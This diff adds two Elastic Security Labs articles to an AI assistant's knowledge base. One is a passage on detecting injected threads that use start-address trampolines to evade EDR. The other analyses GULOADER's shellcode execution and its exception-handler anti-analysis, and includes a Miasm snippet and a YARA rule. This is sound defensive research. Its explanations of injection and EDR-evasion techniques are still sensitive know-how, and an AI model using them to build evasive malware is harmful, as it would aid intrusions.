+The value of the lpStartAddress parameter is stored by the kernel in the Win32StartAddress field within the [ETHREAD](https://www.geoffchappell.com/studies/windows/km/ntoskrnl/inc/ntos/ps/ethread/) structure for that thread.
+
+![Suspicious ETHREAD entry viewed with a kernel debugger](/assets/images/get-injectedthreadex-detection-thread-creation-trampolines/image2.jpg)
+
+This value can be queried from user mode using the documented [NtQueryInformationThread()](https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationthread) syscall with the ThreadQuerySetWin32StartAddress information class. A subsequent call to [VirtualQueryEx()](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualqueryex) can be used to make a second syscall requesting the [basic memory information](https://docs.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-memory_basic_information) for that virtual address from the kernel. This includes an enumeration indicating whether the memory is a mapped PE image, a mapped file, or simply private memory.
+
+![Original detection logic](/assets/images/get-injectedthreadex-detection-thread-creation-trampolines/image1.jpg)
+
+While the original script was a point-in-time retrospective detection implementation, the same information is available inline during [create thread notify](https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntddk/nf-ntddk-pssetcreatethreadnotifyroutine) kernel callbacks. All effective Endpoint Detection and Response (EDR) products should be providing telemetry of suspicious thread creations.
+
+And all effective Endpoint Protection Platform (EPP) products should be denying suspicious thread creations by default – with a mechanism to add allowlist entries for legitimate software exhibiting this behavior.
+
+In the wild, you’ll see “legitimate” instances of this behavior such as from other security products, anti-cheat software, older copy-protection software and some Unix products that have been shimmed to work on Windows. Though, in each instance, this security [code smell](https://en.wikipedia.org/wiki/Code_smell) may be indicative of software that you might not want in an enterprise environment. The use of these methods may be a leading indicator that other [security best practices](https://blog.trailofbits.com/2018/09/26/effortless-security-feature-detection-with-winchecksec/) have not been followed. Even with this finite set of exceptions to handle, this detection and/or prevention approach remains highly relevant and successful today.
+
+### 1 - Bring your own trampoline
+
+The simplest trampoline is a small hook. The adversary only needs to write the necessary jump instruction into existing image-backed memory. This is the approach that Filip Olszak used to bypass Get-InjectedThread with [DripLoader](https://blog.redbluepurple.io/offensive-research/bypassing-injection-detection).
+
+These bytes can even be restored to their original values immediately after thread creation. This helps to avoid retrospective detections such as our script – but recall that your endpoint security product should be doing _inline_ detection and will be able to scrutinize the hooked thread entrypoint at execution time, and deny execution if necessary.
+
+![Basic hook trampoline](/assets/images/get-injectedthreadex-detection-thread-creation-trampolines/image9.png)
+
+The above proof-of-concept hooks ntdll!DbgUiRemoteBreakin, which is a legitimate remote thread start address, though it should rarely be seen in production environments. In practice, the hook can be placed on any function bytes unlikely to be called in normal operation– or even slack space between functions, or at the end of the PE section.
+
+Also note the use of WriteProcessMemory() instead of a simple memcpy(). MEM_IMAGE pages are typically read only, and the former handles toggling the page protections to writable and back for us.
+
+We can detect hooked start addresses fairly easily because we can detect persistent inline hooks fairly easily. In order to save memory, allocations for shared libraries use the same backing physical memory pages and are marked COPY_ON_WRITE in each process’s address space. So, as soon as the hook is inserted, the whole page can no longer be shared. Instead, a copy is created in the working set of the process.
+
+Using the [QueryWorkingSetEx()](https://docs.microsoft.com/en-us/windows/win32/api/psapi/nf-psapi-queryworkingsetex) API, we can query the kernel to determine whether the page containing the start address is sharable or is in a private working set.
+
+Now we know that something on the page was modified – but we don’t know if our address was hooked. And, for our updated PowerShell script, this is all that we do. Recall that the bytes can be unhooked after the thread has started– so any further checks on already running threads could result in a false negative.
+
+However, this could also be a false positive if there is a “legitimate” hook or other modification.
+
+In particular, many, many security products still hook ntdll.dll. This was an entirely legitimate technical approach back in 2007 when Vista was released: it allowed existing x86 features based on kernel syscall hooks to be quickly ported to the nascent x64 architecture using user mode syscall hooks instead. The validity of such approaches has been more questionable since Windows 10 was released in 2015. Around this time, x64 was cemented as the primary Windows architecture and we could firmly relegate the less secure x86 Windows to legacy status. The value proposition for user mode hooking was further reduced in 2017 when Windows 10 Creators Update [added additional kernel mode instrumentation](https://blog.redbluepurple.io/windows-security-research/kernel-tracing-injection-detection) to provide more robust detection approaches for malicious usage of certain abused syscalls.
+
+For reference, our original Elastic Endgame product has features implemented using user mode hooks whereas our newer Elastic Endpoint has not yet determined a need to use a user mode hook at all in order to attain equal or better protection compared to Endgame. This means that Elastic Endgame must defend these hooks from tampering whereas Elastic Endpoint is currently invulnerable to the various so-called “universal EDR bypasses” that perform ntdll.dll unhooking.
+
+Older security products aside, there are also many products that extend the functionality of other products via hooks– or perhaps unpack their code at runtime, etc. So, if that 4KB page is private, then security products need to additionally compare the start address bytes to an original pristine copy and alert if they differ.
+
+And, to deploy at scale, they also need to maintain an allowlist for those rare legitimate uses.
+
+### 2 - Shifting the trampoline mat
+
+Technically the security product will only be able to see the bytes at the time of the thread notification callback which is slightly before the thread executes. Malware could create a [suspended](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createthread#parameters) thread, let the thread callback execute, and only then hook the start bytes before finally resuming the thread. Don’t worry though - effective security products can detect that inline too. But that’s a topic for another day.
+
+This brings us to the second trampoline approach though: hijacking the execution flow before the entrypoint is ever called. Why obviously hook the thread entrypoint of our suspended thread when, with a little sleight of hand, we can usurp execution by modifying its instruction pointer directly (or an equivalent context manipulation) with [SetThreadContext()](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-setthreadcontext), or by queuing an [“early bird” Asynchronous Procedure Call](https://www.cyberbit.com/endpoint-security/new-early-bird-code-injection-technique-discovered/) (APC)?
+
+The problem with creating the illusion of a legitimate entrypoint like this is that it doesn’t hold up to any kind of rigorous inspection.
+
+In a normal thread, the user mode start address is typically the third function call in the thread’s stack – after ntdll!RtlUserThreadStart and kernel32!BaseThreadInitThunk. So when the thread has been hijacked, this is going to be obvious in the call stack.
+
+For instruction pointer manipulation, the first frame will belong to the injected code.
+
+For “early bird” APC injection, the base of the call stack will be ntdll!LdrInitializeThunk, ntdll!NtTestAlert, ntdll!KiUserApcDispatcher and then the injected code.
+
+The updated script detects various anomalous call stack bases.
+
+False positives are possible where legitimate software finds it necessary to modify Windows process or thread initialisation. For example, this was observed with the [MSYS2](https://www.msys2.org/) Linux environment. There is also an edge case where a function might have been generated with a [Tail Call Optimisation](https://en.wikipedia.org/wiki/Tail_call) (TCO), which eliminates unnecessary stack frames for performance. However, these cases can all be easily handled with a small exception list.
+
+### 3 - If it walks like a trampoline, and it talks like a trampoline...
+
+The third trampoline approach is to find a suitable gadget within image-backed memory so that no code modification is necessary. This is one of the approaches that Adam Chester employed in his blog.
+
+Our earlier hook was 12 bytes and finding an exact 12-byte gadget is unlikely in practice.
+
+However, on x64 Windows, functions use a four-register fast-call calling convention by default. So when the OS calls our gadget we will have control over the RCX register which will contain the parameter we passed into CreateThread().
+
+The simplest x64 gadget is the two-byte JMP RCX instruction “ff e1” – which is fairly trivial to find.
+
+![JMP RCX gadget in ntdll.dll](/assets/images/get-injectedthreadex-detection-thread-creation-trampolines/image16.png)
+
+Gadgets don’t even need to be instructions per se – they could be within operands or other data in the code section. For example, the above “ff e1” gadget in ntdll.dll was part of the relative address of a GUID.
+
+We can detect this too- because it doesn’t work generically yet.
+
+In all modern Windows software, thread start addresses are protected by Control Flow Guard (CFG) which has a bitmap of valid indirect call targets computed at compile time. In order to use this gadget, malware must either first disable CFG or call the [SetProcessValidCallTargets()](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-setprocessvalidcalltargets) function to ask the kernel to dynamically set the bit corresponding to this gadget in the CFG bitmap.
+
+Just to be clear: this is not a CFG bypass. It is a CFG feature to support legitimate software doing weird things. Remember that CFG is an exploit protection– and being able to call SetProcessCallTargets() in order to call CreateThread() is a chicken and egg problem for exploit developers.
+
+Like before, to save memory, the CFG bitmap pages for DLLs are also shared between processes. This time we can detect whether the start address’s CFG bitmap entry is on a sharable page or in a private working set- and alert if it is private.
+
+Control Flow Guard is described in detail [elsewhere](https://www.blackhat.com/docs/us-15/materials/us-15-Zhang-Bypass-Control-Flow-Guard-Comprehensively-wp.pdf), but a high level CFG overview here is helpful to understanding our approach to detection. Each two bits in the CFG bitmap corresponds to 16 addresses. Two bits gives us four states. Specifically, in a pretty neat optimization by Microsoft, two states correspond only to the 16-byte aligned address (allowed, and export suppressed) and two states correspond to all 16 addresses (allowed and denied).
+
+Modern CPUs fetch instructions in 16-byte lines so modern compilers typically align the vast majority of function entrypoints to 16-bytes. The vast majority of CFG entries only set a single address as a valid indirect call target, and very few entries will specify a whole block of 16 addresses as valid call targets. This means that the CFG bitmap can be an eighth of the size without any appreciable increase in the risk of valid gadgets due to an overly permissive bitmap.
+
+However, if each two bits corresponds to 16 addresses, then a private 4K page of CFG bits corresponds to 256KB of code. That’s quite the false positive potential!
+
+Therefore, we just have to hope that legitimate code never does this… nevermind. You should never hope that legitimate code won’t do obscure things. To date, we’ve identified three contemporary scenarios:
+
+- The legacy Edge browser would [harden its javascript host process](https://web.archive.org/web/20161031134827/http://blog.trendmicro.com/trendlabs-security-intelligence/control-flow-guard-improvements-windows-10-anniversary-update/) by un-setting CFG bits for certain abusable functions
+- user32.dll appears to be too kind to legacy software – and will un-suppress export addresses if they are registered as call back functions
+- Some security products will drop a page of hook trampolines too close to legitimate modules and private executable memory always has private bitmap entries (Actually they’ll often drop this at a module’s preferred load address – which prevents the OS from sharing memory for that module)
+
+So we need to rule out false positives by comparing against an expected CFG bitmap value. We could read this from the PE file on disk, but the x64 bitmap is already mapped into our process as part of the shared CFG bitmap.
+
+The PowerShell script implementation we’ve released alerts on both cases: a modified CFG page and a start address with a non-original CFG value.
+
+A very small number of CFG-compatible gadgets [might](https://i.blackhat.com/briefings/asia/2018/asia-18-Lain-Back-To-The-Epilogue-How-To-Evade-Windows-Control-Flow-Guard-With-Less-Than-16-Bytes.pdf) [exist](https://www.ndss-symposium.org/wp-content/uploads/2018/02/ndss2018_05A-3_Biondo_paper.pdf) at a given point in time, but only in very specific DLLs that will likely appear anomalous in the surrogate process.
+
+### 4 - It's literally already a trampoline
+
+The third bypass category is to find an existing function that does exactly what we want, and there are many of these. For example, the one highlighted by Christopher Paschen is Microsoft’s C Runtime (CRT). This implementation of the C standard library works as an API layer that sits above Win32– and it includes thread creation APIs.
+
+These APIs perform some extra CRT bookkeeping on thread creation/destruction by passing an internal CRT thread entrypoint to CreateThread() and by passing the user entrypoint to subsequently call as part of the structure pointed to by the CreateThread() parameter.
+
+So, in this case, the Win32StartAddress observed will be the non-exported msvcrt!\_startthread(ex). The shellcode address will be at a specific offset from the thread parameter during thread creation (Microsoft CRT source is available), and the shellcode will be the next frame on the call stack after the CRT.
+
+Note: without additional tricks this can only be used to create in-process threads and there is no CreateRemoteThread() equivalent. Those tricks exist, however, and you should not expect this module as a start address in remote threads.
+
+Unfortunately, there is no operating system bookkeeping that will tell you if a thread was created remotely after the fact. Consequently, we can’t scan for this with our script– but the inline callbacks used by security products can make this distinction.
+
+Currently, the script simply traverses the stack bottom-up and infers the first handful of frames by looking at candidate return addresses. This code could definitely be improved via disassembly or using unwind information, which are less rewarding to implement in PowerShell. The current approach is reliable enough for demonstration purposes:
+
+![Get-InjectedThead - 1 hit](/assets/images/get-injectedthreadex-detection-thread-creation-trampolines/image15.png)
+
+![Get-InjectedThreadEx - 5 hits](/assets/images/get-injectedthreadex-detection-thread-creation-trampolines/image4.png)
+
+The updated script detects the original suspicious thread in addition to the four classes of bypass described in this research.
+
+## Hunting suspicious thread creations
+
+In addition to detections for the four known major classes of thread start address trampolines, the updated script also includes some additional heuristics. Some of these have medium false positive rates and are hidden behind an -Aggressive flag. However, they may still be useful in hunting scenarios.
+
+![prolog byte regex](/assets/images/get-injectedthreadex-detection-thread-creation-trampolines/image14.png
+
+The first looks at the starting bytes of the thread’s user entrypoint. [Function prologs](https://docs.microsoft.com/en-us/cpp/build/prolog-and-epilog) have structure- except when they don’t. There is no decompiler in PowerShell as far as we know – so we approximated with a byte pattern regular expression instead. Identifying code that doesn’t follow convention is useful but could easily exist in a compiler that we haven’t tested against.
+
+Interestingly, we had to account for the “MZ” magic bytes that correspond to a [DOS Executable](https://en.wikipedia.org/wiki/DOS_MZ_executable) being a purportedly valid thread entrypoint. The Windows loader [ignores](https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/hosting/corexemain-function) the value of the AddressOfEntry field in the PE header for Common Language Runtime (CLR) executables such as .NET.
+
+Instead, execution always starts in MsCorEE!\_CorExeMain() in the CLR Runtime which determines the actual process entrypoint from the CLR metadata. This makes sense as CLR assembly might only contain bytecode which needs to be JIT’d by the runtime before being called. However, the value of this field is still passed to CreateThread() and it is often zero- which results in the unexpected MZ entrypoint bytes.
+
+![tail byte regex](/assets/images/get-injectedthreadex-detection-thread-creation-trampolines/image5.png)
+
+The second heuristic examines the bytes immediately preceding the user entrypoint. This is usually a return, a jump, or a filler byte. Common filler bytes are zero, nop, and int 3. However, this is only a convention.
+
+In particular, older compilers would regularly place data side by side with code- presumably to achieve performance through data locality. For example, we previously analysed the x64 binaries on Microsoft’s symbol server and noticed that this mixing of code and data was normal in Visual Studio 2012, was mostly remediated in VS2013, and appears to have been finally fixed in VS2015 Update 2.
+
+![16-byte pseudo alignment](/assets/images/get-injectedthreadex-detection-thread-creation-trampolines/image3.png)
+
+The third heuristic is yet another compiler convention. As mentioned earlier, compilers like to output functions that maximize the instruction cache performance which typically use 16-byte fetches. But compilers appear to also like to save space– so they typically only ensure that the first basic block fits within the smallest number of 16-byte lines as opposed to strict 16-byte alignment. In other words, if a basic block is 20 bytes then it’ll always need at least two fetches, but we want to ensure that it doesn’t need three.
+
+![unexpected Win32 modules](/assets/images/get-injectedthreadex-detection-thread-creation-trampolines/image14.png)
+
+Many common Win32 modules have no valid thread entrypoints at all– so check for these.
+
+This list is definitely non-exhaustive.
+
+Kernel32.dll is a special case. LoadLibrary is not technically a valid thread entrypoint– but CreateRemoteThread(kernel32!LoadLibraryA, “signed.dll”) is actually how most security products would prefer software to do code injection into running processes when necessary. That is, the injected code is signed and loaded into read-only image-backed memory. To the best of our knowledge, we believe that this approach was first proposed by Jeffrey Richter in an article in the May 1994 edition of the Microsoft System Journal and later included in his [Advanced Windows](https://openlibrary.org/books/OL1120758M/Advanced_Windows) book. So treat LoadLibrary as suspicious- but not necessarily malicious.
+
+![unexpected ntdll entrypoint](/assets/images/get-injectedthreadex-detection-thread-creation-trampolines/image7.png) ntdll.dll is loaded everywhere so is often the first choice for a gadget or hook. There are only four valid ntdll entrypoints that we know of and the script explicitly checks for these.
+
+Two of these functions aren’t exported, and rather than using P/Invoke to download the public symbols and find the offset in the PDB, the script dynamically queries the start addresses of its own threads for their start addresses to find these. PowerShell already uses worker threads, and the script starts a private ETW logger session to force a thread with the final address.
+
+![unsigned DLL start address](/assets/images/get-injectedthreadex-detection-thread-creation-trampolines/image12.png) Side-loaded DLLs remain a highly popular technique- and are still predominantly unsigned.
+
+![SYSTEM impersonation](/assets/images/get-injectedthreadex-detection-thread-creation-trampolines/image10.png)
+
+This one isn’t a thread start heuristic- but it was too simple not to include. Legitimate threads might impersonate SYSTEM briefly, but (lazy) malware authors (or operators) tend to escalate privileges initially and hold them indefinitely.
+
+## Wrapping up
+
+As flagged last time, nothing in security is a silver bullet. You should not expect 100% detection from suspicious thread creations alone.
+
+For example, an adversary could modify their tools to simply not create any new threads, restricting their execution to hijacked threads only. The distinction is perhaps subtle, but Get-InjectedThreadEx only attempts to detect anomalous thread creation addresses – not the broader case of legitimate threads that were subsequently hijacked. This is why, in addition to imposing costs at thread creation, [Elastic Security](https://www.elastic.co/endpoint-security/) employs other defensive layers including [memory signatures](https://www.elastic.co/blog/detecting-cobalt-strike-with-memory-signatures), [behavioral detections](https://www.elastic.co/blog/elastic-security-opens-public-detection-rules-repo) and [defense evasion detections](https://www.elastic.co/blog/process-ghosting-a-new-executable-image-tampering-attack).
+
+While it is somewhat easy to hijack a single thread after creation (ensuring that all your malware’s threads, including any third-party payloads, uses the right version of the right detection bypass for the installed security products), this is a maintenance cost for the adversary and mistakes will be made.
+
+Let’s keep raising the bar. We’d love to hear about thread creation bypasses- and scalable detection approaches. We’re stronger together.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/getting_gooey_with_guloader_downloader.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/getting_gooey_with_guloader_downloader.md
new file mode 100644
index 0000000000000..3b4358c5e1087
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/getting_gooey_with_guloader_downloader.md
@@ -0,0 +1,246 @@
+---
+title: "Getting gooey with GULOADER: deobfuscating the downloader"
+slug: "getting-gooey-with-guloader-downloader"
+date: "2023-12-06"
+description: "Elastic Security Labs walks through the updated GULOADER analysis countermeasures."
+author:
+  - slug: daniel-stepanic
+image: "photo-edited-03@2x.jpg"
+category:
+  - slug: malware-analysis
+tags:
+  - guloader
+  - cloudeye
+  - Vectored Exception handler
+---
+
+## Overview
+
+Elastic Security Labs continues to monitor active threats such as GULOADER, also known as [CloudEyE](https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye) – an evasive shellcode downloader that has been highly active for years while under constant development. One of these recent changes is the addition of exceptions to its Vectored Exception Handler (VEH) in a fresh campaign, adding more complexity to its already long list of anti-analysis tricks.  
+ 
+While GULOADER’s core functionality hasn’t changed drastically over the past few years, these constant updates in their obfuscation techniques make analyzing GULOADER a time-consuming and resource-intensive process. In this post, we will touch on the following topics when triaging GULOADER:
+
+* Reviewing the initial shellcode and unpacking process
+* Finding the entrypoint of the decrypted shellcode
+* Discuss update to GULOADER’s VEH that obfuscates control flow
+* Provide a methodology to patch out VEH
+
+## Initial Shellcode
+
+In our [sample](https://www.virustotal.com/gui/file/6ae7089aa6beaa09b1c3aa3ecf28a884d8ca84f780aab39902223721493b1f99), GULOADER comes pre-packaged inside an NSIS (Nullsoft Scriptable Install System) installer. When the installer is extracted, the main components are: 
+
+* **NSIS Script** - This script file outlines all the various configuration and installation aspects.
+
+![Extracted NSIS contents](/assets/images/getting-gooey-with-guloader-downloader/image1.png "Extracted NSIS contents")
+
+
+* **System.dll** - Located under the `$PLUGINSDir`. This file is dropped in a temporary folder to allocate/execute the GULOADER shellcode.
+
+![System.Dll exports](/assets/images/getting-gooey-with-guloader-downloader/image10.png "System.Dll exports")
+
+
+* **Shellcode** - The encrypted shellcode is buried into a nested folder.
+
+One quick methodology to pinpoint the file hosting the shellcode can be done by monitoring `ReadFile` events from SysInternal’s Process Monitor after executing GULOADER. In this case, we can see that the shellcode is read in from a file (`Fibroms.Hag`).
+
+![Shellcode Retrieved from File](/assets/images/getting-gooey-with-guloader-downloader/image11.png "Shellcode Retrieved from File")
+
+
+GULOADER executes shellcode through callbacks using different Windows API functions. The main reasoning behind this is to avoid detections centered around traditional Windows APIs used for process injection, such as `CreateRemoteThread` or `WriteProcessMemory`. We have observed `EnumResourceTypesA` and `CallWindowProcW` used by GULOADER.
+
+![EnumResourceTypesA Function Call inside GULOADER](/assets/images/getting-gooey-with-guloader-downloader/image6.png "EnumResourceTypesA Function Call inside GULOADER")
+
+
+By reviewing the MSDN documentation for [`EnumResourceTypesA`](https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-enumresourcetypesa), we can see the second parameter expects a pointer to the callback function. From the screenshot above, we can see that the newly allocated shellcode is placed into this argument.
+
+![EnumResourceTypesA Function Parameters](/assets/images/getting-gooey-with-guloader-downloader/image13.png "EnumResourceTypesA Function Parameters")
+
+
+![Shellcode from second parameter EnumResourceTypesA call](/assets/images/getting-gooey-with-guloader-downloader/image7.png "Shellcode from second parameter EnumResourceTypesA call")
+
+
+## Finding Main Shellcode Entrypoint
+
+In recent samples, GULOADER has increased the complexity at the start of the initial shellcode by including many different junk instructions and jumps. Reverse engineering of the downloader can require dealing with a long process of unwinding code obfuscation designed to break disassembly and control flow in some tooling, making it frustrating to find the actual start of the core GULOADER shellcode.
+
+One methodology for finding the initial call can be leveraging graph view inside x64dbg and using a bottom-to-top approach to look for the `call eax` instruction. 
+
+![Graph view for GULOADER main entrypoint call](/assets/images/getting-gooey-with-guloader-downloader/image16.png "Graph view for GULOADER main entrypoint call")
+
+
+Another technique to trace the initial control flow involves leveraging the reversing engineering framework [Miasm](https://github.com/cea-sec/miasm)**.** Below is a quick example where we can pass in the shellcode and disassemble the instructions to follow the flow: 
+
+```
+from miasm.core.locationdb import LocationDB
+from miasm.analysis.binary import Container
+from miasm.analysis.machine import Machine
+
+with open("proctoring_06BF0000.bin", "rb") as f:
+    code = f.read()
+
+loc_db = LocationDB()
+c = Container.from_string(code, loc_db)
+
+machine = Machine('x86_32')
+mdis = machine.dis_engine(c.bin_stream, loc_db=loc_db)
+mdis.follow_call = True 
+mdis.dontdis_retcall = True
+asm_cfg = mdis.dis_multiblock(offset=0x1400)
+```
+
+Miasm cuts through the 142 `jmp` instructions and navigates through the junk instructions where we have configured it to stop on the call instruction to EAX (address: `0x3bde`).  
+
+```
+JMP        loc_3afd
+->	c_to:loc_3afd 
+loc_3afd
+MOV        EBX, EAX
+FADDP      ST(3), ST
+PANDN      XMM7, XMM2
+JMP        loc_3b3e
+->	c_to:loc_3b3e 
+loc_3b3e
+SHL        CL, 0x0
+PSRAW      MM1, MM0
+PSRLD      XMM1, 0xF1
+JMP        loc_3b97
+->	c_to:loc_3b97 
+loc_3b97
+CMP        DL, 0x3A
+PADDW      XMM3, XMM5
+PXOR       MM3, MM3
+JMP        loc_3bde
+->	c_to:loc_3bde 
+loc_3bde
+CALL       EAX
+```
+*Tail end of Miasm*
+
+## GULOADER’s VEH Update
+
+One of GULOADER’s hallmark techniques is centered around its [Vectored Exception Handling](https://learn.microsoft.com/en-us/windows/win32/debug/vectored-exception-handling) (VEH) capability. This feature gives Windows applications the ability to intercept and handle exceptions before they are routed through the standard exception process. Malware families and software protection applications use this technique to make it challenging for analysts and tooling to follow the malicious code.
+
+GULOADER starts this process by adding the VEH using `RtlAddVectoredExceptionHandler`. Throughout the execution of the GULOADER shellcode, there is code purposely placed to trigger these different exceptions. When these exceptions are triggered, the VEH will check for hardware breakpoints. If not found, GULOADER will modify the EIP directly through the [CONTEXT structure](https://learn.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-context) using a one-byte XOR key (changes per sample) with a one-byte offset from where the exception occurred. We will review a specific example of this technique in the subsequent section. Below is the decompilation of our sample’s VEH:
+
+![Decompilation of VEH](/assets/images/getting-gooey-with-guloader-downloader/image3.png "Decompilation of VEH")
+
+
+Although this technique is not new, GULOADER continues to add new exceptions over time; we have recently observed these two exceptions added in the last few months:
+
+* `EXCEPTION_PRIV_INSTRUCTION`
+* `EXCEPTION_ILLEGAL_INSTRUCTION`
+
+As new exceptions get added to GULOADER, it can end up breaking tooling used to expedite the analysis process for researchers. 
+
+### EXCEPTION_PRIV_INSTRUCTION
+
+Let’s walk through the two recently added exceptions to follow the VEH workflow. The first exception (`EXCEPTION_PRIV_INSTRUCTION`), occurs when an attempt is made to execute a privileged instruction in a processor’s instruction set at a privilege level where it’s not allowed. Certain instructions, like the example below with [WRSMR](https://www.felixcloutier.com/x86/wrmsr) expect privileges from the kernel level, so when the program is run from user mode, it will trigger the exception due to incorrect permissions.
+
+
+![EXCEPTION_PRIV_INSTRUCTION triggered by wrmsr instruction](/assets/images/getting-gooey-with-guloader-downloader/image2.png "EXCEPTION_PRIV_INSTRUCTION triggered by wrmsr instruction")
+
+
+### EXCEPTION_ILLEGAL_INSTRUCTION
+
+This exception is invoked when a program attempts to execute an invalid or undefined CPU instruction. In our sample, when we run into Intel virtualization instructions such as `vmclear` or `vmxon`, this will trigger an exception.  
+
+![EXCEPTION_ILLEGAL_INSTRUCTION triggered by vmclear instruction](/assets/images/getting-gooey-with-guloader-downloader/image14.png "EXCEPTION_ILLEGAL_INSTRUCTION triggered by vmclear instruction")
+
+
+Once an exception occurs, the GULOADER VEH code will first determine which exception code was responsible for the exception. In our sample, if the exception matches any of the five below, the code will take the same path regardless.
+
+* `EXCEPTION_ACCESS_VIOLATION` 
+* `EXCEPTION_ILLEGAL_INSTRUCTION`
+* `EXCEPTION_PRIV_INSTRUCTION`
+* `EXCEPTION_SINGLE_STEP`
+* `EXCEPTION_BREAKPOINT`
+
+GULOADER will then check for any hardware breakpoints by walking the CONTEXT record found inside the **[EXCEPTION_POINTERS](https://learn.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-exception_pointers)** structure. If hardware breakpoints are found in the different debug registers, GULOADER will return a `0` into the CONTEXT record, which will end up causing the shellcode to crash.
+
+![GULOADER monitoring hardware breakpoints](/assets/images/getting-gooey-with-guloader-downloader/image4.png "GULOADER monitoring hardware breakpoints")
+
+
+If there are no hardware breakpoints, GULOADER will retrieve a single byte which is 7 bytes away from the address that caused the exception. When using the last example with `vmclear`, it would retrieve byte (`0x8A`).
+
+![GULOADER retrieves a single byte, 7 bytes away from the instruction, causing an exception](/assets/images/getting-gooey-with-guloader-downloader/image9.png "GULOADER retrieves a single byte, 7 bytes away from the instruction, causing an exception")
+
+
+Then, using that byte, it will perform an XOR operation with a different hard-coded byte. In our case (`0xB8`), this is unique per sample. Now, with a derived offset `0x32` (`0xB8 ^ 0x8A`), GULOADER will modify the EIP address directly from the CONTEXT record by adding `0x32` to the previous address (`0x7697630`) that caused the exception resulting in the next code to execute from address (`0x7697662`).
+
+![Junk instructions in between exceptions](/assets/images/getting-gooey-with-guloader-downloader/image8.png "Junk instructions in between exceptions")
+
+
+With different junk instructions in between, and repeatedly hitting exceptions (we counted 229 unique exceptions in our sample), it’s not hard to see why this can break different tooling and increase analyst time.
+
+## Control Flow Cleaning
+
+To make following the control flow easier, an analyst can bypass the VEH by tracing the execution, logging the exceptions, and patching the shellcode using the previously discussed EIP modification algorithm. For this procedure, we leveraged [TinyTracer](https://github.com/hasherezade/tiny_tracer), a tool written by [@hasherezade](https://twitter.com/hasherezade) that leverages [Pin](https://www.intel.com/content/www/us/en/developer/articles/tool/pin-a-dynamic-binary-instrumentation-tool.html), a dynamic binary instrumentation framework. This will allow us to catch the different addresses that triggered the exception, so using the example above with `vmclear`, we can see the address was `0x7697630`, generated an exception calling `KiUserExceptionDispatcher`, a function responsible for handling user-mode exceptions.  
+
+Once all the exceptions are collected and filtered, these can be passed into an IDAPython script where we walk through each address, calculate the offset using the 7th byte over and XOR key (`0xB8`), then patch out all the instructions generating exceptions with short jumps. 
+
+The following image is an example of patching instructions that trigger exceptions at addresses `0x07697630` and `0x0769766C`. 
+
+![Disassembly of patched instructions](/assets/images/getting-gooey-with-guloader-downloader/image15.png "Disassembly of patched instructions")
+
+ 
+Below is a graphic representing the control flow graph before the patching is applied globally. Our basic block with the `vmclear` instruction is highlighted in orange. By implementing the VEH, GULOADER flattens the control flow graph, making it harder to trace the program logic.  
+
+![GULOADER’s control flow flattening obfuscation](/assets/images/getting-gooey-with-guloader-downloader/image5.png "GULOADER’s control flow flattening obfuscation")
+
+
+After patching the VEH with `jmp` instructions, this transforms the basic blocks by connecting them together, reducing the complexity behind the flow of the shellcode.
+
+![GULOADER’s call graph obfuscation](/assets/images/getting-gooey-with-guloader-downloader/image12.png "GULOADER’s call graph obfuscation")
+
+
+Using this technique can accelerate the cleaning process, yet it’s important to note that it isn’t a bulletproof method. In this instance, there still ends up being a good amount of code/functionality that will still need to be analyzed, but this definitely goes a long way in simplifying the code by removing the VEH. The full POC script is located [here](https://github.com/elastic/labs-releases/tree/main/tools/guloader/guloader_FixCFG.py).
+
+## Conclusion
+
+GULOADER has many different features that can break disassembly, hinder control flow, and make analysis difficult for researchers. Despite this and the process being imperfect, we can counter these traits through different static or dynamic processes to help reduce the analysis time. For example, we observed that with new exceptions in the VEH, we can still trace through them and patch the shellcode. This process will set the analyst on the right path, closer to accessing the core functionality with GULOADER. 
+
+By sharing some of our workflow, we hope to provide multiple takeaways if you encounter GULOADER in the wild. Based on GULOADER’s changes, it's highly likely that future behaviors will require new and different strategies. For detecting GULOADER, the following section includes YARA rules, and the IDAPython script from this post can be found [here](https://github.com/elastic/labs-releases/tree/main/tools/guloader/guloader_FixCFG.py). For new updates on the latest threat research, check out our [malware analysis section](https://www.elastic.co/security-labs/topics/malware-analysis) by the Elastic Security Labs team. 
+
+## YARA
+
+Elastic Security has created different YARA [rules](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_Guloader.yar) to identify this activity. Below is an example of one YARA rule to identify GULOADER. 
+
+```
+rule Windows_Trojan_Guloader {
+    meta:
+        author = "Elastic Security"
+        creation_date = "2023-10-30"
+        last_modified = "2023-11-02"   
+        reference_sample = "6ae7089aa6beaa09b1c3aa3ecf28a884d8ca84f780aab39902223721493b1f99"
+        severity = 100
+        arch = "x86"
+        threat_name = "Windows.Trojan.Guloader"
+        license = "Elastic License v2"
+        os = "windows"
+    strings:
+        $djb2_str_compare = { 83 C0 08 83 3C 04 00 0F 84 [4] 39 14 04 75 }
+        $check_exception = { 8B 45 ?? 8B 00 38 EC 8B 58 ?? 84 FD 81 38 05 00 00 C0 }
+        $parse_mem = { 18 00 10 00 00 83 C0 18 50 83 E8 04 81 00 00 10 00 00 50 }
+        $hw_bp = { 39 48 0C 0F 85 [4] 39 48 10 0F 85 [4] 39 48 14 0F 85 [7] 39 48 18 }
+        $scan_protection = { 39 ?? 14 8B [5] 0F 84 }
+    condition:
+        2 of them
+}
+```
+
+## Observations
+ 
+All observables are also available for [download](https://github.com/elastic/labs-releases/tree/main/indicators/guloader) in both ECS and STIX format.
+
+The following observables were discussed in this research.
+
+| Observable                                                       | Type      | Name                    | Reference                |
+|------------------------------------------------------------------|-----------|-------------------------|--------------------------|
